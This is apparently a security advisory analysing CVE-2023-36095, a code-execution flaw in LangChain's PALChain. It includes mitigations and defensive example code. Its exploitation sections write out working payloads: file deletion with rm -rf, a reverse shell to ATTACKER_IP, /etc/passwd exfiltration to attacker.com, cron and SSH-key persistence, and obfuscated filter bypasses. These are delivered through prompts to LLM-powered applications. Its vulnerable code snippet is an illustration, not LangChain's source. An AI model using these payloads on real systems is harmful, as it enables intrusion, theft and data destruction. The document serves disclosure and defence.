CVE-2023-36095
Weakness (CWE)
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: High
- Availability: High
Description
An issue in Harrison Chase langchain v.0.0.194 allows an attacker to execute arbitrary code via the python exec calls in the PALChain, affected functions include from_math_prompt and from_colored_object_prompt.
Comprehensive Technical Analysis of CVE-2023-36095
CVE ID: CVE-2023-36095
CVSS Score: 9.8 (Critical)
Affected Software: Harrison Chase LangChain v0.0.194
Vulnerability Type: Arbitrary Code Execution (ACE) via Improper Input Validation
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2023-36095 is a critical arbitrary code execution (ACE) vulnerability in LangChain v0.0.194, a popular Python framework for developing applications powered by large language models (LLMs). The flaw stems from unsafe use of Python’s exec() function within the PALChain module, specifically in the from_math_prompt and from_colored_object_prompt functions.
CVSS v3.1 Breakdown (Score: 9.8 - Critical)
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over a network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; straightforward exploitation. |
| Privileges Required (PR) | None (N) | No authentication or elevated privileges needed. |
| User Interaction (UI) | None (N) | Exploitation does not require user interaction. |
| Scope (S) | Unchanged (U) | Impact is confined to the vulnerable component. |
| Confidentiality (C) | High (H) | Full system compromise possible. |
| Integrity (I) | High (H) | Attacker can modify system state or data. |
| Availability (A) | High (H) | Denial-of-service or full system takeover possible. |
Severity Justification
- Critical (9.8) due to:
  - Remote exploitation without authentication.
  - Full system compromise via arbitrary code execution.
  - Low attack complexity, making it highly exploitable.
  - Widespread use of LangChain in AI/ML applications, increasing attack surface.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Mechanism
The vulnerability arises from improper sanitization of user-controlled input passed to `exec()` in the following functions:
- `from_math_prompt()`
- `from_colored_object_prompt()`
An attacker can craft malicious input (e.g., via LLM prompts or API calls) that includes arbitrary Python code, which is then executed in the context of the running application.
Exploitation Steps:
- Identify Target: Locate a LangChain-based application using `PALChain` with vulnerable functions.
- Craft Malicious Input:
  - Example payload (for `from_math_prompt`): `"__import__('os').system('rm -rf /') #"`
  - Alternatively, a reverse shell payload: `"__import__('socket').socket().connect(('ATTACKER_IP',4444));__import__('subprocess').call(['/bin/sh','-i'])" #"`
- Trigger Execution:
  - Submit the payload via an API call, chat interface, or other input mechanism.
  - The `exec()` function processes the input, executing the embedded code.
Attack Scenarios
| Scenario | Description | Impact |
|---|---|---|
| Remote Code Execution (RCE) | Attacker sends a crafted prompt to a LangChain-powered chatbot or API. | Full system compromise, data exfiltration, lateral movement. |
| Supply Chain Attack | Malicious dependency injection in LangChain-based applications. | Backdoor installation, persistence. |
| AI Model Poisoning | Exploiting LLM input processing to execute arbitrary commands. | Model manipulation, data corruption. |
3. Affected Systems & Software Versions
Vulnerable Software
- LangChain v0.0.194 (confirmed)
- Potentially earlier versions if they include the same `PALChain` implementation.
Affected Components
- `langchain.chains.pal` module (specifically `PALChain`).
- Functions: `from_math_prompt()`, `from_colored_object_prompt()`
Not Affected
- LangChain versions ≥ 0.0.195 (assuming the issue was patched).
- Other LangChain modules not using `exec()` in an unsafe manner.
4. Recommended Mitigation Strategies
Immediate Actions
- Upgrade LangChain:
  - Update to the latest version (if a patch is available).
  - Monitor LangChain GitHub for fixes.
- Apply Workarounds (if upgrade is not possible):
  - Disable `PALChain` if not required.
  - Input Sanitization:
    - Replace `exec()` with safer alternatives (e.g., `ast.literal_eval()` for mathematical expressions).
    - Implement strict allowlisting for permitted operations.
  - Sandboxing:
    - Run LangChain in a restricted environment (e.g., Docker container with minimal privileges).
    - Use seccomp, AppArmor, or SELinux to limit process capabilities.
- Network-Level Protections:
  - Restrict access to LangChain APIs via firewalls.
  - Rate-limit input to prevent brute-force exploitation.
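As an added example of the allowlisting approach (not LangChain's code and not from the original analysis), the evaluator below accepts only the arithmetic a math prompt is expected to produce and walks the AST itself instead of calling `exec()`. Note that `ast.literal_eval()` alone accepts literals only (it rejects `2 + 3` on current Python), so the permitted operators have to be listed explicitly; the operator set and the exponent bound are assumptions about what the application needs.

```python
import ast
import operator

# Operators a math-prompt answer may legitimately use; every other node type
# (Name, Attribute, Call, Import, ...) is rejected before anything is evaluated.
_BIN_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod, ast.Pow: operator.pow,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}
MAX_EXPONENT = 1000  # assumed bound so a generated expression cannot exhaust CPU/memory


class UnsafeExpression(ValueError):
    """The program text contains something other than plain arithmetic."""


def safe_eval_math(expr: str) -> float:
    """Evaluate an arithmetic expression by walking its AST; no exec()/eval()."""
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError as exc:  # statements such as "import os" fail here
        raise UnsafeExpression(f"not an expression: {exc.msg}") from exc

    def visit(node: ast.AST):
        if isinstance(node, ast.Expression):
            return visit(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            left, right = visit(node.left), visit(node.right)
            if isinstance(node.op, ast.Pow) and abs(right) > MAX_EXPONENT:
                raise UnsafeExpression("exponent too large")
            return _BIN_OPS[type(node.op)](left, right)
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](visit(node.operand))
        # Names, attribute access, calls and everything else land here.
        raise UnsafeExpression(f"disallowed syntax: {type(node).__name__}")

    return visit(tree)


def is_safe_math(expr: str) -> bool:
    """True if the expression evaluates under the allowlist, False otherwise."""
    try:
        safe_eval_math(expr)
    except (UnsafeExpression, ArithmeticError):  # includes ZeroDivisionError
        return False
    return True
```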
Long-Term Recommendations
- Code Review & Secure Coding Practices:
  - Audit all uses of `exec()`, `eval()`, and similar functions.
  - Enforce static and dynamic analysis (e.g., Bandit, Semgrep) to detect unsafe code patterns.
- Dependency Management:
  - Use dependency scanners (e.g., `safety`, `dependabot`) to detect vulnerable versions.
  - Implement SBOM (Software Bill of Materials) tracking.
- Runtime Protection:
  - Deploy RASP (Runtime Application Self-Protection) to detect and block exploitation attempts.
  - Use eBPF-based monitoring to detect anomalous `exec()` calls.
- Incident Response Planning:
  - Develop a playbook for responding to ACE vulnerabilities in AI/ML systems.
  - Conduct red team exercises to test defenses against similar attacks.
5. Impact on the Cybersecurity Landscape
Broader Implications
- AI/ML Security Risks:
  - Highlights growing attack surface in LLM-powered applications.
  - Demonstrates how improper input handling in AI frameworks can lead to RCE.
- Supply Chain Concerns:
  - LangChain is widely used in AI-driven applications, increasing the risk of supply chain attacks.
  - Vulnerabilities in foundational libraries can have cascading effects across multiple industries.
- Regulatory & Compliance Impact:
  - Organizations using LangChain may face compliance violations (e.g., GDPR, HIPAA) if exploited.
  - AI governance frameworks (e.g., NIST AI RMF) may need updates to address such risks.
- Exploitability in the Wild:
  - Given the low complexity of exploitation, proof-of-concept (PoC) exploits are likely to emerge.
  - Threat actors (e.g., ransomware groups, APTs) may weaponize this vulnerability.
Comparable Vulnerabilities
| CVE | Description | Similarity to CVE-2023-36095 |
|---|---|---|
| CVE-2021-44228 (Log4Shell) | RCE via JNDI injection in Log4j. | High severity, widespread impact, remote exploitation. |
| CVE-2022-22965 (Spring4Shell) | RCE in Spring Framework via data binding. | Critical RCE in a widely used framework. |
| CVE-2023-23397 (Outlook Elevation of Privilege) | NTLM relay attack via Outlook. | High-impact, low-complexity exploitation. |
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability exists due to unsafe use of `exec()` in the following functions:
- `langchain/chains/pal/math_prompt.py` (`from_math_prompt`)
- `langchain/chains/pal/colored_object_prompt.py` (`from_colored_object_prompt`)
Vulnerable Code Snippet (Example):

```python
def from_math_prompt(question: str) -> str:
    # UNSAFE: user/LLM-controlled text is interpolated straight into exec()
    namespace: dict = {}
    exec(f"result = {question}", namespace)  # arbitrary code execution possible
    # exec() inside a function cannot create local variables, so the result is
    # read back from the namespace dict it was given.
    return str(namespace["result"])
```
Exploitation Flow:
- User Input: `"__import__('os').system('id') #"`
- Executed Code: `exec("result = __import__('os').system('id') #")`
- Impact: The `id` command executes, revealing system information.
Exploit Development Considerations
- Bypassing Restrictions:
  - If input filtering is applied, attackers may use obfuscation (e.g., base64 encoding, string concatenation).
  - Example: `"__import__('os').system(''.join([chr(105),chr(100)])) #"`
- Post-Exploitation:
  - Reverse Shell: `"__import__('socket').socket().connect(('ATTACKER_IP',4444));__import__('subprocess').call(['/bin/sh','-i'])" #"`
  - Data Exfiltration: `"__import__('requests').post('https://attacker.com/exfil', data=open('/etc/passwd').read())" #"`
- Persistence Mechanisms:
  - Cron Job: `"__import__('os').system('(crontab -l 2>/dev/null; echo \"* * * * * nc -e /bin/sh ATTACKER_IP 4444\") | crontab -')" #"`
  - SSH Key Injection: `"__import__('os').system('echo \"ssh-rsa AAAAB3NzaC1yc2E...\" >> ~/.ssh/authorized_keys')" #"`
Detection & Forensics
- Log Analysis:
  - Monitor for unexpected `exec()` calls in application logs.
  - Look for suspicious Python imports (e.g., `os`, `subprocess`, `socket`).
- Endpoint Detection & Response (EDR):
  - Detect unusual child processes spawned by the LangChain application.
  - Alert on network connections from the application to unexpected destinations.
- Memory Forensics:
  - Use Volatility or Rekall to analyze process memory for injected code.
  - Check for unusual Python modules loaded at runtime.
- Network Traffic Analysis:
  - Inspect outbound connections for data exfiltration attempts.
  - Look for DNS tunneling or HTTP C2 traffic.
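The runtime-protection and log-analysis points above (detecting anomalous `exec()` calls and suspicious `os`/`subprocess`/`socket` usage) can be implemented in-process with Python's audit hooks (3.8+). The block below is an added example, not LangChain's code or part of the original analysis: generated programs are compiled under a recognisable filename, and a `sys.addaudithook` callback inspects the code object the `"exec"` event delivers, records an alert, and refuses to run the program if it references a blocked name. The tag, the name list and the in-memory alert sink are assumptions; this is a defense-in-depth layer alongside the sandboxing recommended earlier, not a replacement for it.

```python
import sys
import types

GENERATED_TAG = "<llm-program>"  # assumed filename given to generated code when compiled
# Assumed set of globals whose use by generated code is worth blocking and alerting on.
BLOCKED_NAMES = {"__import__", "__builtins__", "os", "subprocess", "socket",
                 "open", "eval", "exec", "compile", "getattr", "globals"}
ALERTS: list = []  # constructed in-memory stand-in for a SIEM/log forwarder


def referenced_names(code: types.CodeType) -> set:
    # Nested lambda/def bodies sit in co_consts with their own co_names, so a
    # flat look at the top-level code object alone would miss them.
    names = set(code.co_names)
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            names |= referenced_names(const)
    return names


def _audit(event: str, args: tuple) -> None:
    # exec()/eval() raise the "exec" event with the code object before running it;
    # only code tagged GENERATED_TAG is policed, the rest of the application is not.
    code = args[0] if args else None
    if event != "exec" or getattr(code, "co_filename", None) != GENERATED_TAG:
        return
    hits = sorted(BLOCKED_NAMES & referenced_names(code))
    ALERTS.append({"hits": hits, "blocked": bool(hits)})
    if hits:  # an exception raised from a hook aborts the exec() call
        raise RuntimeError(f"generated program blocked, references {hits}")


def install() -> None:
    # Audit hooks cannot be removed, so register exactly once per process.
    if not getattr(install, "done", False):
        sys.addaudithook(_audit)
        install.done = True


def run_generated(program: str) -> dict:
    """Compile generated text under GENERATED_TAG and run it in a fresh namespace."""
    install()
    code = compile(program, GENERATED_TAG, "exec")
    namespace: dict = {}
    exec(code, namespace)
    return namespace


def is_blocked(program: str) -> bool:
    """True if the audit hook refused to let the program run."""
    try:
        run_generated(program)
    except RuntimeError:
        return True
    return False
```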
Conclusion & Recommendations
CVE-2023-36095 represents a critical security risk due to its low exploitation complexity and high impact. Organizations using LangChain v0.0.194 must immediately upgrade or apply mitigations to prevent arbitrary code execution.
Key Takeaways for Security Teams:
✅ Patch Management: Prioritize updating LangChain to the latest secure version.
✅ Input Validation: Replace exec() with safer alternatives (e.g., ast.literal_eval).
✅ Runtime Protections: Implement sandboxing and RASP to limit exploitation impact.
✅ Monitoring: Deploy EDR and SIEM rules to detect exploitation attempts.
✅ Incident Response: Prepare for potential breaches involving AI/ML frameworks.
Further Research
- Exploit Development: Security researchers should develop PoC exploits to test defenses.
- AI Security Frameworks: Evaluate LangChain’s security model and propose improvements.
- Threat Intelligence: Monitor for real-world exploitation of this vulnerability.
By addressing CVE-2023-36095 proactively, organizations can reduce their attack surface and mitigate the risk of AI-driven cyber threats.